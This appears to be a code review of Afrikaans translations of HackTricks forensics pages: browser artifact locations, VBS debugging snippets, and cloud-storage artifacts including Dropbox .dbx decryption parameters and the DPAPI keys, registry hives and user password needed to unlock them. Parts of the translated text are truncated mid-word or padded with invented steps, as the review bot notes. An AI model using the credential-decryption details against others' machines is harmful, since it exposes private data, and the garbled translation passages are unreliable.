Soos waargeneem kan word in die vorige afdelings, gebruik beide Chrome en Firefox **SQLite** databasisse om die data te stoor. Dit is moontlik om **verwyderde inskrywings te herwin met behulp van die instrumente** [**sqlparse**](https://github.com/padfoot999/sqlparse) **of** [**sqlparse\_gui**](https://github.com/mdegrazia/SQLite-Deleted-Records-Parser/releases).
|
||||
|
||||
## **Internet Explorer 11**
|
||||
|
||||
Internet Explorer 11 manages its data and metadata across various locations, aiding in separating stored information and its corresponding details for easy access and management.
|
||||
Internet Explorer 11 bestuur sy data en metadata oor verskillende liggings, wat help om gestoorde inligting en die ooreenstemmende besonderhede te skei vir maklike toegang en bestuur.
|
||||
|
||||
### Metadata Storage
|
||||
Metadata for Internet Explorer is stored in `%userprofile%\Appdata\Local\Microsoft\Windows\WebCache\WebcacheVX.data` (with VX being V01, V16, or V24). Accompanying this, the `V01.log` file might show modification time discrepancies with `WebcacheVX.data`, indicating a need for repair using `esentutl /r V01 /d`. This metadata, housed in an ESE database, can be recovered and inspected using tools like photorec and [ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html), respectively. Within the **Containers** table, one can discern the specific tables or containers where each data segment is stored, including cache details for other Microsoft tools such as Skype.
|
||||
### Metadata Berging
|
||||
Metadata vir Internet Explorer word gestoor in `%userprofile%\Appdata\Local\Microsoft\Windows\WebCache\WebcacheVX.data` (met VX wat V01, V16, of V24 kan wees). Tesame hiermee, kan die `V01.log` lêer wysigingstyd afwykings met `WebcacheVX.data` toon, wat dui op 'n behoefte vir herstel met behulp van `esentutl /r V01 /d`. Hierdie metadata, wat in 'n ESE databasis gehuisves word, kan herwin en ondersoek word met behulp van instrumente soos photorec en [ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html) onderskeidelik. Binne die **Containers** tabel, kan 'n mens die spesifieke tabelle of houers waar elke data segment gestoor word, onderskei, insluitend cache besonderhede vir ander Microsoft gereedskap soos Skype.
|
||||
|
||||
### Cache Inspection
|
||||
The [IECacheView](https://www.nirsoft.net/utils/ie_cache_viewer.html) tool allows for cache inspection, requiring the cache data extraction folder location. Metadata for cache includes filename, directory, access count, URL origin, and timestamps indicating cache creation, access, modification, and expiry times.
|
||||
### Cache Inspeksie
|
||||
Die [IECacheView](https://www.nirsoft.net/utils/ie_cache_viewer.html) instrument maak dit moontlik om die cache te inspekteer, met die vereiste van die cache data onttrekkingsgids. Metadata vir die cache sluit lêernaam, gids, toegangstellings, URL oorsprong, en tydstempels wat cache skepping, toegang, wysiging, en verval tyd aandui.
|
||||
|
||||
### Cookies Management
|
||||
Cookies can be explored using [IECookiesView](https://www.nirsoft.net/utils/iecookies.html), with metadata encompassing names, URLs, access counts, and various time-related details. Persistent cookies are stored in `%userprofile%\Appdata\Roaming\Microsoft\Windows\Cookies`, with session cookies residing in memory.
|
||||
### Koekies Bestuur
|
||||
Koekies kan ondersoek word met behulp van [IECookiesView](https://www.nirsoft.net/utils/iecookies.html), met metadata wat name, URL's, toegangstellings, en verskeie tydverwante besonderhede insluit. Volgehoue koekies word gestoor in `%userprofile%\Appdata\Roaming\Microsoft\Windows\Cookies`, met sessie koekies wat in die geheue bly.
|
||||
|
||||
### Download Details
|
||||
Downloads metadata is accessible via [ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html), with specific containers holding data like URL, file type, and download location. Physical files can be found under `%userprofile%\Appdata\Roaming\Microsoft\Windows\IEDownloadHistory`.
|
||||
### Aflaaibesonderhede
|
||||
Aflaaibesonderhede is toeganklik via [ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html), met spesifieke houers wat data soos URL, lêertipe, en aflaaigids bevat. Fisiese lêers kan gevind word onder `%userprofile%\Appdata\Roaming\Microsoft\Windows\IEDownloadHistory`.
|
||||
|
||||
### Browsing History
|
||||
To review browsing history, [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing_history_view.html) can be used, requiring the location of extracted history files and configuration for Internet Explorer. Metadata here includes modification and access times, along with access counts. History files are located in `%userprofile%\Appdata\Local\Microsoft\Windows\History`.
|
||||
### Blaai Geskiedenis
|
||||
Om blaai geskiedenis te hersien, kan [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing_history_view.html) gebruik word, met die vereiste van die ligging van die uitgepakte geskiedenis lêers en konfigurasie vir Internet Explorer. Metadata hier sluit wysiging en toegangstye in, tesame met toegangstellings. Geskiedenis lêers is geleë in `%userprofile%\Appdata\Local\Microsoft\Windows\History`.
|
||||
|
||||
### Typed URLs
|
||||
Typed URLs and their usage timings are stored within the registry under `NTUSER.DAT` at `Software\Microsoft\InternetExplorer\TypedURLs` and `Software\Microsoft\InternetExplorer\TypedURLsTime`, tracking the last 50 URLs entered by the user and their last input times.
|
||||
### Getikte URL's
|
||||
Getikte URL's en hul gebruikstye word binne die register gestoor onder `NTUSER.DAT` by `Software\Microsoft\InternetExplorer\TypedURLs` en `Software\Microsoft\InternetExplorer\TypedURLsTime`, wat die laaste 50 URL's wat deur die gebruiker ingevoer is en hul laaste inset tye volg.
|
||||
|
||||
|
||||
## Microsoft Edge
|
||||
|
||||
Microsoft Edge stores user data in `%userprofile%\Appdata\Local\Packages`. The paths for various data types are:
|
||||
Microsoft Edge stoor gebruikersdata in `%userprofile%\Appdata\Local\Packages`. Die paaie vir verskillende datatipes is:
|
||||
|
||||
- **Profile Path**: `C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC`
|
||||
- **History, Cookies, and Downloads**: `C:\Users\XX\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat`
|
||||
- **Settings, Bookmarks, and Reading List**: `C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\XXX\DBStore\spartan.edb`
|
||||
- **Profiel Pad**: `C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC`
|
||||
- **Geskiedenis, Koekies, en Aflaaibestande**: `C:\Users\XX\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat`
|
||||
- **Instellings, Bladmerke, en Leeslys**: `C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\XXX\DBStore\spartan.edb`
|
||||
- **Cache**: `C:\Users\XXX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC#!XXX\MicrosoftEdge\Cache`
|
||||
- **Last Active Sessions**: `C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC\MicrosoftEdge\User\Default\Recovery\Active`
|
||||
- **Laaste Aktiewe Sessies**: `C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC\MicrosoftEdge\User\Default\Recovery\Active`
|
||||
|
||||
## Safari
|
||||
|
||||
Safari data is stored at `/Users/$User/Library/Safari`. Key files include:
|
||||
Safari data word gestoor by `/Users/$User/Library/Safari`. Sleutellêers sluit in:
|
||||
|
||||
- **History.db**: Contains `history_visits` and `history_items` tables with URLs and visit timestamps. Use `sqlite3` to query.
|
||||
- **Downloads.plist**: Information about downloaded files.
|
||||
- **Bookmarks.plist**: Stores bookmarked URLs.
|
||||
- **TopSites.plist**: Most frequently visited sites.
|
||||
- **Extensions.plist**: List of Safari browser extensions. Use `plutil` or `pluginkit` to retrieve.
|
||||
- **UserNotificationPermissions.plist**: Domains permitted to push notifications. Use `plutil` to parse.
|
||||
- **LastSession.plist**: Tabs from the last session. Use `plutil` to parse.
|
||||
- **Browser’s built-in anti-phishing**: Check using `defaults read com.apple.Safari WarnAboutFraudulentWebsites`. A response of 1 indicates the feature is active.
|
||||
|
||||
## Opera
|
||||
|
||||
Opera's data resides in `/Users/$USER/Library/Application Support/com.operasoftware.Opera` and shares Chrome's format for history and downloads.
|
||||
|
||||
- **Browser’s built-in anti-phishing**: Verify by checking if `fraud_protection_enabled` in the Preferences file is set to `true` using `grep`.
|
||||
|
||||
These paths and commands are crucial for accessing and understanding the browsing data stored by different web browsers.
|
||||
|
||||
|
||||
## References
|
||||
* [https://nasbench.medium.com/web-browsers-forensics-7e99940c579a](https://nasbench.medium.com/web-browsers-forensics-7e99940c579a)
|
||||
* [https://www.sentinelone.com/labs/macos-incident-response-part-3-system-manipulation/](https://www.sentinelone.com/labs/macos-incident-response-part-3-system-manipulation/)
|
||||
* [https://books.google.com/books?id=jfMqCgAAQBAJ&pg=PA128&lpg=PA128&dq=%22This+file](https://books.google.com/books?id=jfMqCgAAQBAJ&pg=PA128&lpg=PA128&dq=%22This+file)
|
||||
* **Book: OS X Incident Response: Scripting and Analysis By Jaron Bradley pag 123**
|
||||
|
||||
|
||||
<figure><img src="../../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
Get Access Today:
|
||||
|
||||
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
- **History.db**: Bevat `history_visits` en `history_items` tabelle met URL's en besoek tydstempels. Gebruik `sqlite3` om navrae te doen.
|
||||
- **Downloads.plist**: Inligting oor afgelaai lêers.
|
||||
- **Bookmarks.plist**: Stoor gebl
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**Die PEASS Familie**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking truuks deur PRs in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
|
|
|
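Review bot: the translated file loses the tail of the page: the Afrikaans Safari list stops mid-word at `- **Bookmarks.plist**: Stoor gebl` and jumps straight into the footer bullets, so the remaining Safari items (TopSites.plist, Extensions.plist, UserNotificationPermissions.plist, LastSession.plist and the `defaults read com.apple.Safari WarnAboutFraudulentWebsites` check), the whole Opera section, the closing sentence, the References list, the Trickest banner and the first footer bullet are all absent from the new version; the header's line counts (113 old, 76 new) reflect the loss. Those blocks need to be restored (translated, or kept verbatim for the References) before merging. Smaller translation points in the Chrome and Edge lists: `**Huidige Vlakke**` / `**Laaste Vlakke**` render "Tabs" as "levels" (suggest `Oortjies`), and `**Geskiedenis, Koekies, en Aflaaibestande**` mixes in a Dutch word (suggest `Aflaaie`, as used elsewhere on the page).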
@ -1,81 +1,87 @@
|
|||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
Some things that could be useful to debug/deobfuscate a malicious VBS file:
|
||||
Sommige dinge wat nuttig kan wees om 'n skadelike VBS-lêer te ontleed/deobfuskasie:
|
||||
|
||||
## echo
|
||||
|
||||
```bash
|
||||
Wscript.Echo "Like this?"
|
||||
```
|
||||
|
||||
## Commnets
|
||||
|
||||
## Kommentaar
|
||||
```bash
|
||||
' this is a comment
|
||||
```
|
||||
|
||||
## Test
|
||||
|
||||
## Toets
|
||||
```bash
|
||||
cscript.exe file.vbs
|
||||
```
|
||||
## Skryf data na 'n lêer
|
||||
|
||||
## Write data to a file
|
||||
Om data na 'n lêer te skryf, kan jy die volgende stappe volg:
|
||||
|
||||
1. Maak 'n nuwe lêer aan deur die lêer te skep met die gewenste naam en lêeruitbreiding. Byvoorbeeld, as jy 'n lêer met die naam "data.txt" wil skep, kan jy die volgende opdrag gebruik:
|
||||
|
||||
```bash
|
||||
echo > data.txt
|
||||
```
|
||||
|
||||
2. Open die lêer in 'n teksredigeerder of skryfprogram. Jy kan 'n teksredigeerder soos Notepad++ of Vim gebruik.
|
||||
|
||||
3. Skryf die data wat jy wil stoor in die lêer. Jy kan enige teks of binêre data in die lêer skryf. Byvoorbeeld:
|
||||
|
||||
```bash
|
||||
echo "Dit is 'n voorbeeld van data wat in die lêer geskryf word." > data.txt
|
||||
```
|
||||
|
||||
4. Stoor die veranderinge en sluit die lêer.
|
||||
|
||||
Nou sal die spesifiseerde data in die lêer gestoor word.
|
||||
```js
|
||||
Function writeBinary(strBinary, strPath)
|
||||
|
||||
Dim oFSO: Set oFSO = CreateObject("Scripting.FileSystemObject")
|
||||
Dim oFSO: Set oFSO = CreateObject("Scripting.FileSystemObject")
|
||||
|
||||
' below lines purpose: checks that write access is possible!
|
||||
Dim oTxtStream
|
||||
' below lines purpose: checks that write access is possible!
|
||||
Dim oTxtStream
|
||||
|
||||
On Error Resume Next
|
||||
Set oTxtStream = oFSO.createTextFile(strPath)
|
||||
On Error Resume Next
|
||||
Set oTxtStream = oFSO.createTextFile(strPath)
|
||||
|
||||
If Err.number <> 0 Then MsgBox(Err.message) : Exit Function
|
||||
On Error GoTo 0
|
||||
If Err.number <> 0 Then MsgBox(Err.message) : Exit Function
|
||||
On Error GoTo 0
|
||||
|
||||
Set oTxtStream = Nothing
|
||||
' end check of write access
|
||||
Set oTxtStream = Nothing
|
||||
' end check of write access
|
||||
|
||||
With oFSO.createTextFile(strPath)
|
||||
.Write(strBinary)
|
||||
.Close
|
||||
End With
|
||||
With oFSO.createTextFile(strPath)
|
||||
.Write(strBinary)
|
||||
.Close
|
||||
End With
|
||||
|
||||
End Function
|
||||
```
|
||||
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
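Review bot: the `Skryf data na 'n lêer` section gains content that is not in the source: steps 1 to 4 (`1. Maak 'n nuwe lêer aan ...` through `Nou sal die spesifiseerde data in die lêer gestoor word.`) and the two `echo ... > data.txt` code blocks are a generic shell tutorial the English page never had; the original section is only the heading followed by the VBScript `writeBinary` function. Suggest deleting the inserted steps so the translation stays a translation. Also the `writeBinary` block is re-indented (leading spaces stripped from every line inside `Function writeBinary`) without any translated text in it; that whitespace churn belongs in a separate commit if at all. Minor wording: `om 'n skadelike VBS-lêer te ontleed/deobfuskasie` mixes a verb and a noun; `te ontleed/deobfuskeer` reads correctly.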
@ -1,138 +1,136 @@
|
|||
# Local Cloud Storage
|
||||
# Plaaslike Wolklêerstoor
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
|
||||
|
||||
</details>
|
||||
|
||||
<figure><img src="../../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
Get Access Today:
|
||||
Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik werkstrome te bou en outomatiseer met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\
|
||||
Kry vandag toegang:
|
||||
|
||||
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
||||
|
||||
## OneDrive
|
||||
|
||||
In Windows, you can find the OneDrive folder in `\Users\<username>\AppData\Local\Microsoft\OneDrive`. And inside `logs\Personal` it's possible to find the file `SyncDiagnostics.log` which contains some interesting data regarding the synchronized files:
|
||||
In Windows kan jy die OneDrive-vouer vind in `\Users\<gebruikersnaam>\AppData\Local\Microsoft\OneDrive`. En binne `logs\Personal` is dit moontlik om die lêer `SyncDiagnostics.log` te vind wat interessante data bevat oor die gesinkroniseerde lêers:
|
||||
|
||||
* Size in bytes
|
||||
* Creation date
|
||||
* Modification date
|
||||
* Number of files in the cloud
|
||||
* Number of files in the folder
|
||||
* **CID**: Unique ID of the OneDrive user
|
||||
* Report generation time
|
||||
* Size of the HD of the OS
|
||||
* Grootte in bytes
|
||||
* Skeppingsdatum
|
||||
* Wysigingsdatum
|
||||
* Aantal lêers in die wolk
|
||||
* Aantal lêers in die vouer
|
||||
* **CID**: Unieke ID van die OneDrive-gebruiker
|
||||
* Verslaggenereringstyd
|
||||
* Grootte van die bedryfstelsel se harde skyf
|
||||
|
||||
Once you have found the CID it's recommended to **search files containing this ID**. You may be able to find files with the name: _**\<CID>.ini**_ and _**\<CID>.dat**_ that may contain interesting information like the names of files synchronized with OneDrive.
|
||||
Nadat jy die CID gevind het, word dit aanbeveel om **lêers te soek wat hierdie ID bevat**. Jy kan lêers met die naam vind: _**\<CID>.ini**_ en _**\<CID>.dat**_ wat interessante inligting kan bevat, soos die name van lêers wat met OneDrive gesinkroniseer is.
|
||||
|
||||
## Google Drive
|
||||
|
||||
In Windows, you can find the main Google Drive folder in `\Users\<username>\AppData\Local\Google\Drive\user_default`\
|
||||
This folder contains a file called Sync\_log.log with information like the email address of the account, filenames, timestamps, MD5 hashes of the files, etc. Even deleted files appear in that log file with its corresponding MD5.
|
||||
In Windows kan jy die hoof Google Drive-vouer vind in `\Users\<gebruikersnaam>\AppData\Local\Google\Drive\user_default`\
|
||||
Hierdie vouer bevat 'n lêer genaamd Sync\_log.log met inligting soos die e-posadres van die rekening, lêernaam, tydstempels, MD5-hashes van die lêers, ens. Selfs uitgevee lêers verskyn in daardie loglêer met die ooreenstemmende MD5.
|
||||
|
||||
The file **`Cloud_graph\Cloud_graph.db`** is a sqlite database which contains the table **`cloud_graph_entry`**. In this table you can find the **name** of the **synchronized** **files**, modified time, size, and the MD5 checksum of the files.
|
||||
Die lêer **`Cloud_graph\Cloud_graph.db`** is 'n sqlite-databasis wat die tabel **`cloud_graph_entry`** bevat. In hierdie tabel kan jy die **naam** van die **gesinkroniseerde** **lêers**, gewysigde tyd, grootte en die MD5-kontrolegetal van die lêers vind.
|
||||
|
||||
The table data of the database **`Sync_config.db`** contains the email address of the account, the path of the shared folders and the Google Drive version.
|
||||
Die tabeldata van die databasis **`Sync_config.db`** bevat die e-posadres van die rekening, die pad van die gedeelde vouers en die Google Drive-weergawe.
|
||||
|
||||
## Dropbox
|
||||
|
||||
Dropbox uses **SQLite databases** to manage the files. In this\
|
||||
You can find the databases in the folders:
|
||||
Dropbox gebruik **SQLite-databasisse** om die lêers te bestuur. In hierdie\
|
||||
Jy kan die databasisse in die volgende vouers vind:
|
||||
|
||||
* `\Users\<username>\AppData\Local\Dropbox`
|
||||
* `\Users\<username>\AppData\Local\Dropbox\Instance1`
|
||||
* `\Users\<username>\AppData\Roaming\Dropbox`
|
||||
* `\Users\<gebruikersnaam>\AppData\Local\Dropbox`
|
||||
* `\Users\<gebruikersnaam>\AppData\Local\Dropbox\Instance1`
|
||||
* `\Users\<gebruikersnaam>\AppData\Roaming\Dropbox`
|
||||
|
||||
And the main databases are:
|
||||
En die belangrikste databasisse is:
|
||||
|
||||
* Sigstore.dbx
|
||||
* Filecache.dbx
|
||||
* Deleted.dbx
|
||||
* Config.dbx
|
||||
|
||||
The ".dbx" extension means that the **databases** are **encrypted**. Dropbox uses **DPAPI** ([https://docs.microsoft.com/en-us/previous-versions/ms995355(v=msdn.10)?redirectedfrom=MSDN](https://docs.microsoft.com/en-us/previous-versions/ms995355\(v=msdn.10\)?redirectedfrom=MSDN))
|
||||
Die ".dbx"-uitbreiding beteken dat die **databasisse** **gekripteer** is. Dropbox gebruik **DPAPI** ([https://docs.microsoft.com/en-us/previous-versions/ms995355(v=msdn.10)?redirectedfrom=MSDN](https://docs.microsoft.com/en-us/previous-versions/ms995355\(v=msdn.10\)?redirectedfrom=MSDN))
|
||||
|
||||
To understand better the encryption that Dropbox uses you can read [https://blog.digital-forensics.it/2017/04/brush-up-on-dropbox-dbx-decryption.html](https://blog.digital-forensics.it/2017/04/brush-up-on-dropbox-dbx-decryption.html).
|
||||
Om die kriptering wat Dropbox gebruik beter te verstaan, kan jy lees [https://blog.digital-forensics.it/2017/04/brush-up-on-dropbox-dbx-decryption.html](https://blog.digital-forensics.it/2017/04/brush-up-on-dropbox-dbx-decryption.html).
|
||||
|
||||
However, the main information is:
|
||||
Die belangrikste inligting is egter:
|
||||
|
||||
* **Entropy**: d114a55212655f74bd772e37e64aee9b
|
||||
* **Salt**: 0D638C092E8B82FC452883F95F355B8E
|
||||
* **Algorithm**: PBKDF2
|
||||
* **Iterations**: 1066
|
||||
* **Entropie**: d114a55212655f74bd772e37e64aee9b
|
||||
* **Sout**: 0D638C092E8B82FC452883F95F355B8E
|
||||
* **Algoritme**: PBKDF2
|
||||
* **Iterasies**: 1066
|
||||
|
||||
Apart from that information, to decrypt the databases you still need:
|
||||
Afgesien van daardie inligting, om die databasisse te ontsluit, het jy steeds nodig:
|
||||
|
||||
* The **encrypted DPAPI key**: You can find it in the registry inside `NTUSER.DAT\Software\Dropbox\ks\client` (export this data as binary)
|
||||
* The **`SYSTEM`** and **`SECURITY`** hives
|
||||
* The **DPAPI master keys**: Which can be found in `\Users\<username>\AppData\Roaming\Microsoft\Protect`
|
||||
* The **username** and **password** of the Windows user
|
||||
* Die **gekripteerde DPAPI-sleutel**: Jy kan dit in die register vind binne `NTUSER.DAT\Software\Dropbox\ks\client` (voer hierdie data uit as binêr)
|
||||
* Die **`SYSTEM`** en **`SECURITY`**-bytjies
|
||||
* Die **DPAPI-hoofsleutels**: Wat gevind kan word in `\Users\<gebruikersnaam>\AppData\Roaming\Microsoft\Protect`
|
||||
* Die **gebruikersnaam** en **wagwoord** van die Windows-gebruiker
|
||||
|
||||
Then you can use the tool [**DataProtectionDecryptor**](https://nirsoft.net/utils/dpapi\_data\_decryptor.html)**:**
|
||||
Dan kan jy die instrument [**DataProtectionDecryptor**](https://nirsoft.net/utils/dpapi\_data\_decryptor.html)** gebruik:**
|
||||
|
||||
![](<../../../.gitbook/assets/image (448).png>)
|
||||
|
||||
